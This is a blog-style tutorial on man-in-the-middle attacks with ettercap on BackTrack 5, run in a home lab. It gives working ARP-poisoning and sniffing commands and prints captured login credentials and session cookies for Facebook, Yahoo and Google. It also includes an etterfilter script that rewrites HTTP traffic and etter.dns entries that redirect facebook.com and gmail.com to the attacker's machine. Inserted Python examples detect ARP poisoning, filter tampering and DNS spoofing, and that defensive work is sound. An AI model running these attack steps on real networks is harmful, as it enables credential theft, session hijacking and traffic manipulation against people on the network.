ettercap on BackTrack 5

This is really just an update of my earlier post, but this time I am using BackTrack V and covering more of ettercap's features. Ettercap is often called the Swiss Army Knife; it is the tool most commonly used for MITM (man in the middle) attacks. MITM comes in many variants: sniffing, spoofing, phishing, cookie hijacking and many more. OK, here is a description of my setup.
1. Attacker: BackTrack V R1
IP address:

Link encap:Ethernet HWaddr f4:ec:38:99:60:f3
 inet addr:192.168.1.6 Bcast:192.168.1.255 Mask:255.255.255.0
 inet6 addr: fe80::f6ec:38ff:fe99:60f3/64 Scope:Link
 UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
 RX packets:29319 errors:0 dropped:0 overruns:0 frame:0
 TX packets:30177 errors:0 dropped:0 overruns:0 carrier:0
 collisions:0 txqueuelen:1000
 RX bytes:17469869 (17.4 MB) TX bytes:6132389 (6.1 MB)
2. Target: Windows XP (installed in VirtualBox)
IP address: 192.168.1.14
3. Gateway: 192.168.1.1 (TP-Link modem router)
4. Access point: 192.168.1.50 (3Com)
OK, let's begin..

First step: an attacker usually collects targets first. This time I use nmap.
zee@eichel{~}:nmap -sn -n 192.168.1.1/24
 Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-01-06 14:29 WIT
 Nmap scan report for 192.168.1.1
 Host is up (0.0076s latency).
 MAC Address: C8:64:C7:4B:B8:D0 (zte)
 Nmap scan report for 192.168.1.6 ===> Attacker
 Host is up.
 Nmap scan report for 192.168.1.14 ===> Target
 Host is up (0.0029s latency).
 MAC Address: 08:00:27:45:C0:C0 (Cadmus Computer Systems)
 Nmap scan report for 192.168.1.25
 Host is up (0.0095s latency).
 MAC Address: 1C:4B:D6:44:75:9D (AzureWave)
 Nmap scan report for 192.168.1.50
 Host is up (0.014s latency).
 MAC Address: 00:1E:C1:4C:BF:F6 (3com Europe)
 Nmap done: 256 IP addresses (5 hosts up) scanned in 2.35 seconds
Let's look at ettercap's man page; get used to reading it, because reading is how we learn the details.
ETTERCAP(8) ETTERCAP(8)
NAME
ettercap NG-0.7.3 - A multipurpose sniffer/content filter for man in
the middle attacks
***** IMPORTANT NOTE ******
Since ettercap NG (formerly 0.7.0), all the options have been changed.
Even the target specification has been changed. Please read carefully
this man page.
SYNOPSIS
ettercap [OPTIONS] [TARGET1] [TARGET2]
TARGET is in the form MAC/IPs/PORTs
where IPs and PORTs can be ranges (e.g. /192.168.0.1-30,40,50/20,22,25)
DESCRIPTION
Ettercap was born as a sniffer for switched LAN (and obviously even
"hubbed" ones), but during the development process it has gained more
and more features that have changed it to a powerful and flexible tool
for man-in-the-middle attacks. It supports active and passive dissection
of many protocols (even ciphered ones) and includes many features
for network and host analysis (such as OS fingerprint). (and so on)
Now what ?
PREPARE :
If we want this Swiss Army Knife's attack to work properly on SSL-secured connections, we must make sure the redir_command_on script in etter.conf is active. By default, on BackTrack Linux R1, etter.conf lives in
/etc/etter.conf
To activate it, open etter.conf with your favourite editor and uncomment the lines below.
# if you use iptables:
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

Dumping traffic over ARP (sniffing: dumping HTTPS cookies)

Command: ettercap -T -w dump -i wlan0 -M ARP /xxx.xxx.x.x/ //
Explanation:
1. Dump traffic and sniff
2. Syntax
 -T = text mode
 -w = write to a file, in this example named "dump"
 -i = interface to use (default = eth0)
 -M = attack type (MITM)
Output:
zee@eichel{~}:ettercap -T -w dump -i wlan0 -M ARP /192.168.1.1/ //
 ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA
 Listening on wlan0... (Ethernet)
 wlan0 -> F4:EC:38:99:60:F3 192.168.1.6 255.255.255.0
 Privileges dropped to UID 0 GID 0...
 28 plugins
 39 protocol dissectors
 53 ports monitored
 7587 mac vendor fingerprint
 1698 tcp OS fingerprint
 2183 known services
 Randomizing 255 hosts for scanning...
 Scanning the whole netmask for 255 hosts...
 * |==================================================>| 100.00 %
 5 hosts added to the hosts list...
 ARP poisoning victims:
 GROUP 1 : 192.168.1.1 C8:64:C7:4B:B8:D0
 GROUP 2 : ANY (all the hosts in the list)
 Starting Unified sniffing...
 Text only Interface activated...
 Hit 'h' for inline help
 Fri Jan 6 15:04:25 2012
 TCP 69.171.224.11:443 --> 192.168.1.14:1116 | SA
 HTTP : 69.171.224.11:443 -> USER: teconhackers@yahoo.com PASS: testes INFO: http://www.facebook.com/
 Fri Jan 6 15:04:25 2012
 TCP 192.168.1.14:1116 --> 69.171.224.11:443 | P
 POST /login.php?login_attempt=1 HTTP/1.1.
 Host: www.facebook.com.
 User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:7.0.1) Gecko/20100101 Firefox/7.0.1.
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8.
 Accept-Language: id,en-us;q=0.7,en;q=0.3.
 Accept-Encoding: gzip, deflate.
 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7.
 Connection: keep-alive.
 Referer: http://www.facebook.com/.
 Cookie: datr=-JSqTtD5bQG1_TZPO4s_w1F0; lu=RAxSgUQ56_3YJisKv_hVcK2w; lsd=5OOOR; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F; 
 reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F; wd=855x451; act=1325837039360%2F1%3A2; _e_qGyw_0=%5B%22qGyw%22%2C1325837031899%2C%22act%22%2C1325837031895%2C0%2C%22email%22%2C%22click%22%2C%22click%22
 %2C%22-%22%2C%22r%22%2C%22%2F%22%2C%7B%22ft%22%3A%7B%7D%2C%22gt%22%3A%7B%7D%7D%2C648%2C37%2C0%2C838%2C16%5D; _e_qGyw_1=%5B%22qGyw%22%2C1325837039364%2C%22act%22%2C1325837039360%2C1%2C%22pass%22%2C%22click%22%2C%22click%22%2C%22-%22%2C%22r%22%2C%22%2F%22%2C%7B%22ft%22%3A%7B%7D%2C%22gt%22%3A%7B%7D%7D%2
 Fri Jan 6 15:04:25 2012
 TCP 192.168.1.14:1116 --> 69.171.224.11:443 | P
 C798%2C39%2C0%2C838%2C16%5D.
 Content-Type: application/x-www-form-urlencoded.
 Content-Length: 276.
 .
 charset_test=%E2%82%AC%2C%C2%B4%2C%E2%82%AC%2C%C2%B4%2C%E6%B0%B4%2C%D0%94%
 2C%D0%84&lsd=5OOOR&locale=id_ID&email=teconhackers%40yahoo.com&pass=testes&
 default_persistent=0&charset_test=%E2%82%AC%2C%C2%B4%2C%E2%82%AC%2C%C2%B4%2C
 %E6%B0%B4%2C%D0%94%2C%D0%84&lsd=5OOOR&timezone=-270
 Fri Jan 6 15:04:31 2012
 TCP 69.171.224.11:443 --> 192.168.1.14:1116 | P
 HTTP/1.1 200 OK.
 Cache-Control: private, no-cache, no-store, must-revalidate.
 Expires: Sat, 01 Jan 2000 00:00:00 GMT.
 P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p".
 Pragma: no-cache.
 X-Content-Type-Options: nosniff.
 X-Frame-Options: DENY.
 Set-Cookie: _e_qGyw_0=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly.
 Set-Cookie: _e_qGyw_1=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly.
 Set-Cookie: datr=-JSqTtD5bQG1_TZPO4s_w1F0; expires=Sun, 05-Jan-2014 08:04:30 GMT; path=/; domain=.facebook.com; httponly.
 Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Flogin.php%3Flogin_attempt%3D1; path=/; domain=.facebook.com.
 Set-Cookie: sfiu=AYiQWdMg0NKJJtjnR5tVGVvbNWEMxoG_LiLa0edz4Cl1Dat4VE5lNttqg66Y1AHmjG6eSmP3y8c8Q3UlogKtkOItnAr5I2uMzVEZJEd1HSvnRpbJDnULxFRjPYmUQdI5e8H4LJ2OdkxMMsOvFBT6UeBM; 
 expires=Sun, 05-Feb-2012 08:04:30 GMT; path=/; domain=.facebook.com; httponly.
 Set-Cookie: wd=deleted; expires=Thu, 01-Ja
 Fri Jan 6 15:04:31 2012
 TCP 69.171.224.11:443 --> 192.168.1.14:1116 | P
 n-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly.
 Content-Encoding: gzip.
 Content-Type: text/html; charset=utf-8.
 X-FB-Server: 10.54.101.46.
 X-Cnection: close.
 Date: Fri, 06 Jan 2012 08:04:30 GMT.
 Content-Length: 6549.
 .
 [gzip-compressed HTML body: ettercap prints this and the following packets of the response as unreadable bytes; omitted here]
 Fri Jan 6 15:04:33 2012
 TCP 69.171.224.11:443 --> 192.168.1.14:1116 | R
Note the output I marked: username teconhackers@yahoo.com and password testes, plus the cookies that were dumped.

ATTACK METHOD: ARP POISONING + SNIFFING

1. Attacking the whole network
By attacking the whole network I mean an attack aimed at every host behind one router (gateway).
ettercap -T -q -M ARP // //
This is strongly discouraged when the target network is large; it will slow the machine down badly. With high hardware specs we may have the capacity for this method.
Syntax:
 -q = quiet mode (packet contents are not printed)
Combined syntax for attacking the whole network
ettercap -T -q -M ARP // //
Output:
zee@eichel{~}:ettercap -T -q -i wlan0 -M ARP // //
 ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA
 Listening on wlan0... (Ethernet)
 wlan0 -> F4:EC:38:99:60:F3 192.168.1.6 255.255.255.0
 Privileges dropped to UID 0 GID 0...
 28 plugins
 39 protocol dissectors
 53 ports monitored
 7587 mac vendor fingerprint
 1698 tcp OS fingerprint
 2183 known services
 Randomizing 255 hosts for scanning...
 Scanning the whole netmask for 255 hosts...
 * |==================================================>| 100.00 %
 5 hosts added to the hosts list...
 ARP poisoning victims:
 GROUP 1 : ANY (all the hosts in the list)
 GROUP 2 : ANY (all the hosts in the list)
 Starting Unified sniffing...
 Text only Interface activated...
 Hit 'h' for inline help
 HTTP : 69.171.228.13:443 -> USER: teconhackers@yahoo.com PASS: 
 testers INFO: https://www.facebook.com/
 HTTP : 66.163.169.186:443 -> USER: niceday PASS: 299281 
 INFO: https://login.yahoo.com/config/login_verify2?&.src=ym
2. Attacking one specific IP
If the network is too big, it is better to attack a chosen target IP. The attack starts with the syntax
ettercap -T -q -M ARP /xxx.xxx.xxx.xxx/ //
As an example we attack the target IP 192.168.1.14
Output:
zee@eichel{~}:ettercap -T -q -i wlan0 -M ARP /192.168.1.14/ //
 ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA
 Listening on wlan0... (Ethernet)
 wlan0 -> F4:EC:38:99:60:F3 192.168.1.6 255.255.255.0
 Privileges dropped to UID 0 GID 0...
 28 plugins
 39 protocol dissectors
 53 ports monitored
 7587 mac vendor fingerprint
 1698 tcp OS fingerprint
 2183 known services
 Randomizing 255 hosts for scanning...
 Scanning the whole netmask for 255 hosts...
 * |==================================================>| 100.00 %
 4 hosts added to the hosts list...
 ARP poisoning victims:
 GROUP 1 : 192.168.1.14 08:00:27:45:C0:C0
 GROUP 2 : ANY (all the hosts in the list)
 Starting Unified sniffing...
 Text only Interface activated...
 Hit 'h' for inline help
 HTTP : 72.14.203.84:443 -> USER: zee-eichel@gmail.com 
 PASS: uufjjeiisjau INFO: 
 https://accounts.google.com/ServiceLogin?service=mail&passive=true&rm=false&continue=http://mail.google.com/mail/&scc=1&ltmpl=default&ltmplcache=2
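The nmap host list at the start of the post and the "ARP poisoning victims" lines above together show what a defender has to work with: a known IP-to-MAC baseline, and ARP replies in which one MAC (here the attacker's F4:EC:38:99:60:F3) suddenly answers for the gateway and for the target. The following added example (not code from the post or from ettercap) builds the baseline from the post's nmap output and runs two passive checks over constructed ARP reply records and a constructed `arp -an` listing from a poisoned host; the reply records are assumed sample data, not captured traffic.

```python
"""ARP poisoning detector: compare observed ARP replies against a baseline.

Added example, not code from the original post or from ettercap. The baseline
is copied from the nmap -sn host list in the post; the ARP reply records and
the `arp -an` listing are constructed samples of what a monitor on the wlan0
segment (or the poisoned host itself) would see.
"""
import re
from collections import defaultdict

# Baseline IP -> MAC table from the post's nmap output (MACs lowercased).
BASELINE = {
    "192.168.1.1": "c8:64:c7:4b:b8:d0",   # gateway (zte)
    "192.168.1.6": "f4:ec:38:99:60:f3",   # attacker's own BackTrack box
    "192.168.1.14": "08:00:27:45:c0:c0",  # target (VirtualBox guest)
    "192.168.1.25": "1c:4b:d6:44:75:9d",
    "192.168.1.50": "00:1e:c1:4c:bf:f6",  # access point (3Com)
}

# Constructed ARP replies: (sender_ip, sender_mac, target_ip).
SAMPLE_REPLIES = [
    ("192.168.1.1", "C8:64:C7:4B:B8:D0", "192.168.1.14"),   # genuine gateway reply
    ("192.168.1.1", "F4:EC:38:99:60:F3", "192.168.1.14"),   # attacker claims the gateway IP
    ("192.168.1.14", "F4:EC:38:99:60:F3", "192.168.1.1"),   # attacker claims the target IP
    ("192.168.1.25", "1C:4B:D6:44:75:9D", "192.168.1.1"),   # genuine reply
]

# Constructed `arp -an` output (Linux format) from a host whose cache was poisoned.
SAMPLE_ARP_AN = """\
? (192.168.1.1) at f4:ec:38:99:60:f3 [ether] on wlan0
? (192.168.1.50) at 00:1e:c1:4c:bf:f6 [ether] on wlan0
"""

ARP_AN_LINE = re.compile(r"\((?P<ip>[\d.]+)\) at (?P<mac>[0-9a-f:]{17})", re.IGNORECASE)


def parse_arp_an(text):
    """Parse `arp -an` lines into an IP -> MAC dict (MACs lowercased)."""
    cache = {}
    for line in text.splitlines():
        m = ARP_AN_LINE.search(line)
        if m:
            cache[m.group("ip")] = m.group("mac").lower()
    return cache


def check_cache(cache, baseline):
    """Host-side check: cache entries whose MAC differs from the baseline."""
    return [
        f"{ip}: cache has {mac}, baseline says {baseline[ip]}"
        for ip, mac in cache.items()
        if ip in baseline and baseline[ip] != mac
    ]


def detect_arp_poisoning(replies, baseline):
    """Monitor-side checks on a stream of ARP replies:
    1. a sender IP answering from a MAC other than its baseline MAC;
    2. one MAC claiming several IPs (the attacker's MAC answers for both
       GROUP 1 and GROUP 2 of the poisoning run)."""
    alerts = []
    claims = defaultdict(set)  # mac -> set of IPs it has claimed
    for sender_ip, sender_mac, target_ip in replies:
        mac = sender_mac.lower()
        claims[mac].add(sender_ip)
        expected = baseline.get(sender_ip)
        if expected is not None and expected != mac:
            alerts.append(f"{sender_ip} answered from {mac}, expected {expected} (reply sent to {target_ip})")
    for mac, ips in claims.items():
        if len(ips) > 1:
            alerts.append(f"{mac} claims {len(ips)} addresses: {', '.join(sorted(ips))}")
    return alerts


if __name__ == "__main__":
    for alert in detect_arp_poisoning(SAMPLE_REPLIES, BASELINE) + check_cache(parse_arp_an(SAMPLE_ARP_AN), BASELINE):
        print("ALERT:", alert)
```

On a real segment the replies would come from a packet capture and the baseline from an inventory or DHCP leases; the same two checks are what tools like arpwatch implement. Static ARP entries for the gateway on critical hosts, or dynamic ARP inspection on managed switches, stop the poisoning rather than just reporting it.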

Filters (have fun with ettercap)

Heheh, now let's play with ettercap using some filters. This time we try a filter coded by Irongeek.
Here is the script; copy-paste it, save it as ig.filter, then compile it with ettercap's etterfilter.
############################################################################
#                                                                          #
# Jolly Pwned -- ig.filter -- filter source file                           #
#                                                                          #
# By Irongeek. based on code from ALoR & NaGA                              #
# Along with some help from Kev and jon.dmml                               #
# http://ettercap.sourceforge.net/forum/viewtopic.php?t=2833               #
#                                                                          #
# This program is free software; you can redistribute it and/or modify     #
# it under the terms of the GNU General Public License as published by     #
# the Free Software Foundation; either version 2 of the License, or        #
# (at your option) any later version.                                      #
#                                                                          #
############################################################################
# Requests to port 80: strip compression so the response body is editable.
if (ip.proto == TCP && tcp.dst == 80) {
   if (search(DATA.data, "Accept-Encoding")) {
      replace("Accept-Encoding", "Accept-Rubbish!");
      # note: replacement string is same length as original string
      msg("zapped Accept-Encoding!\n");
   }
}
# Responses from port 80: keep the "img src=" tag text so the tag stays valid
# and prefix it with the replacement image URL; the original source is left
# behind as a stray attribute.
if (ip.proto == TCP && tcp.src == 80) {
   replace("img src=", "img src=\"http://fbcdn-sphotos-a.akamaihd.net/hphotos-ak-snc7/310716_228831213842949_100001482164189_675549_1767862890_n.jpg\" ");
   replace("IMG SRC=", "IMG SRC=\"http://fbcdn-sphotos-a.akamaihd.net/hphotos-ak-snc7/310716_228831213842949_100001482164189_675549_1767862890_n.jpg\" ");
   msg("Filter Ran.\n");
}
Compiling: etterfilter [name].filter -o [output].ef
zee@eichel{~}:etterfilter ig.filter -o ig.ef
 etterfilter NG-0.7.3 copyright 2001-2004 ALoR & NaGA
 12 protocol tables loaded:
 DECODED DATA udp tcp gre icmp ip arp wifi fddi tr eth
 11 constants loaded:
 VRRP OSPF GRE UDP TCP ICMP6 ICMP PPTP PPPoE IP ARP
 Parsing source file 'ig.filter' done.
 Unfolding the meta-tree done.
 Converting labels to real offsets done.
 Writing output to 'ig.ef' done.
 -> Script encoded into 16 instructions.
What this filter script does is simply replace every image the victim opens in the browser with the image of our choice. To run ettercap with a given filter script:
ettercap -T -q -F ig.ef -M ARP // //
If lines like
Filter Ran.
Filter Ran.
Filter Ran.
Filter Ran.
Filter Ran.
Filter Ran.
Filter Ran.
appear, the ARP poisoning is running and images are being swapped for the chosen one, so every poisoned target host or network sees the replaced image on every website it opens in the browser.
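The filter leaves two traces that can be checked without seeing the attacker at all: the server receives requests carrying an "Accept-Rubbish!" header (the same-length rewrite of Accept-Encoding), and the client receives pages in which every img tag now loads the same foreign URL. The added example below (not code from the post or from Irongeek's filter) runs those two checks over constructed HTTP samples; the hostnames and the injected image URL are placeholders, and the "tampered" samples are produced by applying the filter's own string replacements to the clean ones.

```python
"""Detect the traces an in-transit HTTP filter leaves on requests and pages.

Added example, not code from the original post or from Irongeek's filter. The
constructed samples mirror what ig.filter does: it rewrites the request header
Accept-Encoding to Accept-Rubbish! (so the server sends an uncompressed body it
can edit) and prefixes every img src in the response with one fixed image URL.
The hostnames and the image URL here are placeholders, not values from the post.
"""
import re
from urllib.parse import urlparse

CLEAN_REQUEST = (
    "GET / HTTP/1.1\r\n"
    "Host: www.example.com\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:7.0.1) Gecko/20100101 Firefox/7.0.1\r\n"
    "Accept-Encoding: gzip, deflate\r\n"
    "Connection: keep-alive\r\n"
    "\r\n"
)
# Same request after the filter's same-length header rewrite.
TAMPERED_REQUEST = CLEAN_REQUEST.replace("Accept-Encoding", "Accept-Rubbish!")

CLEAN_HTML = '<html><body><img src="/logo.png"><p>hi</p><img src="/photo.jpg"></body></html>'
# Placeholder for the image URL the filter injects.
INJECTED_URL = "http://cdn.placeholder.example/PLACEHOLDER.jpg"
# Same page after the filter's response-side replace("img src=", "img src=\"URL\" ").
TAMPERED_HTML = CLEAN_HTML.replace('img src=', f'img src="{INJECTED_URL}" ')


def parse_headers(raw):
    """Split a raw HTTP message head into (start line, {lowercased name: value})."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def inspect_request(raw):
    """Server-side checks: the rewritten header name is a direct indicator;
    a browser request with no Accept-Encoding at all is only a weaker hint."""
    findings = []
    _, headers = parse_headers(raw)
    if "accept-rubbish!" in headers:
        findings.append("Accept-Rubbish! header present (etterfilter Accept-Encoding rewrite)")
    elif "accept-encoding" not in headers and "mozilla/5.0" in headers.get("user-agent", "").lower():
        findings.append("browser request without Accept-Encoding (compression possibly stripped in transit)")
    return findings


IMG_SRC = re.compile(r'<img\s[^>]*?src=["\']?([^"\'\s>]+)', re.IGNORECASE)


def off_site_image_sources(html, site_host):
    """Client-side check: absolute image URLs whose host is not the page's host."""
    return [s for s in IMG_SRC.findall(html)
            if s.lower().startswith("http") and urlparse(s).hostname != site_host]


def page_images_hijacked(html, site_host):
    """True when the page has images and all of them now load from one foreign URL."""
    foreign = off_site_image_sources(html, site_host)
    return bool(foreign) and len(set(foreign)) == 1 and len(foreign) == len(IMG_SRC.findall(html))


if __name__ == "__main__":
    print(inspect_request(TAMPERED_REQUEST))
    print(page_images_hijacked(TAMPERED_HTML, "www.example.com"))
```

The request check belongs in a web server's access logging or a WAF rule; the page check is what a browser extension or a synthetic monitor fetching your own site over plain HTTP could run. Neither is a fix: the filter only works because the traffic is plaintext HTTP on port 80, so serving the site over HTTPS with HSTS removes the attack surface entirely.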

Spoofing plugin

Spoofing is an MITM technique that diverts traffic from its real path to an address of the attacker's choosing. In short, the attacker forces the target to an address the attacker picked, in place of the address the target actually meant to reach.
Ettercap has a plugin for this kind of MITM attack.
Run an nmap scan as I showed at the start of this article. Once we have the network information, make sure IP forwarding is enabled on the attacker machine.
To enable IP forwarding
Linux:
echo 1 > /proc/sys/net/ipv4/ip_forward
BSD:
sysctl -w net.inet.ip.forwarding=1
Then configure the names to be spoofed in the etter.dns file. By default on BackTrack V R1, etter.dns is at
 /usr/local/share/ettercap/etter.dns
Uncomment or edit these lines with the domain whose IP you want to spoof.
facebook.com A 192.168.1.6
 *.facebook.com A 192.168.1.6
 www.facebook.com PTR 192.168.1.6 # Wildcards in PTR are not allowed
Replace the IP address with the substitute address. Here I use the address of the BackTrack machine, 192.168.1.6, so facebook.com and www.facebook.com will be directed to 192.168.1.6.
ettercap syntax with the dns_spoof plugin
 ettercap -T -q -i wlan0 -P dns_spoof -M ARP // //
-P = plugin
I tried spoofing gmail.com to 192.168.1.6.
Output:
(screenshot: spoofing attack)
(screenshot: ping result on the target host)
Look at the ping result on the target host: the domain www.gmail.com has been directed (spoofed) to 192.168.1.6. Since I have an Apache web server running (a localhost server), when the target host opens gmail.com in the browser, the browser loads my local web page at 192.168.1.6.
(screenshot: spoofed page in the target's browser)
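The etter.dns entries above produce a distinctive signature: public names (facebook.com, www.gmail.com) resolving to an RFC 1918 address on the local segment, and one private address answering for several unrelated domains. The added example below (not code from the post or from ettercap) runs those two checks over constructed DNS answers; the spoofed answers mirror the post's etter.dns lines, the `.local` suffix is an assumed list of names legitimately served from private space, and the public address is an arbitrary sample value.

```python
"""Flag DNS answers that look like a local dns_spoof rewrite.

Added example, not code from the original post or from ettercap. The answers
are constructed; the spoofed ones mirror the etter.dns lines in the post
(facebook.com A 192.168.1.6, www.gmail.com resolved to 192.168.1.6) and the
public address is an arbitrary sample value.
"""
import ipaddress
from collections import defaultdict

# Constructed (query name, A record answer) pairs as observed on the LAN.
OBSERVED_ANSWERS = [
    ("www.facebook.com", "192.168.1.6"),
    ("facebook.com", "192.168.1.6"),
    ("www.gmail.com", "192.168.1.6"),
    ("www.example.org", "93.184.216.34"),   # sample public answer
    ("intranet.local", "192.168.1.50"),     # legitimately internal
]

# Name suffixes the site legitimately serves from its own private address
# space (assumption for this example).
INTERNAL_SUFFIXES = (".local",)


def registrable(name):
    """Crude registrable-domain extraction (last two labels); enough for this check."""
    return ".".join(name.lower().rstrip(".").split(".")[-2:])


def is_internal(name, internal_suffixes=INTERNAL_SUFFIXES):
    return name.lower().endswith(internal_suffixes)


def find_spoofed_answers(answers, internal_suffixes=INTERNAL_SUFFIXES):
    """Two checks:
    1. a public name resolving to a private (RFC 1918, loopback, link-local)
       address, which is what an etter.dns entry pointing at the attacker's
       LAN address produces;
    2. one private address answering for several unrelated registrable domains."""
    alerts = []
    domains_per_private_ip = defaultdict(set)
    for name, answer in answers:
        ip = ipaddress.ip_address(answer)
        if is_internal(name, internal_suffixes):
            continue
        if ip.is_private:
            alerts.append(f"{name} -> {answer}: public name resolved to a private address")
            domains_per_private_ip[answer].add(registrable(name))
    for answer, domains in domains_per_private_ip.items():
        if len(domains) > 1:
            alerts.append(f"{answer} answers for {len(domains)} unrelated domains: {', '.join(sorted(domains))}")
    return alerts


if __name__ == "__main__":
    for alert in find_spoofed_answers(OBSERVED_ANSWERS):
        print("ALERT:", alert)
```

The input pairs would normally come from a resolver's query log or a capture of DNS responses on the segment. dns_spoof works by answering faster than the real resolver, so a second, independent check is to re-query the same name over an encrypted path (DoT/DoH to a known resolver) and compare; encrypting the stub-to-resolver path is also what removes the attack.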
OK, I hope this post is useful. I will update this article later; next time I will add how to counter attacks like these.
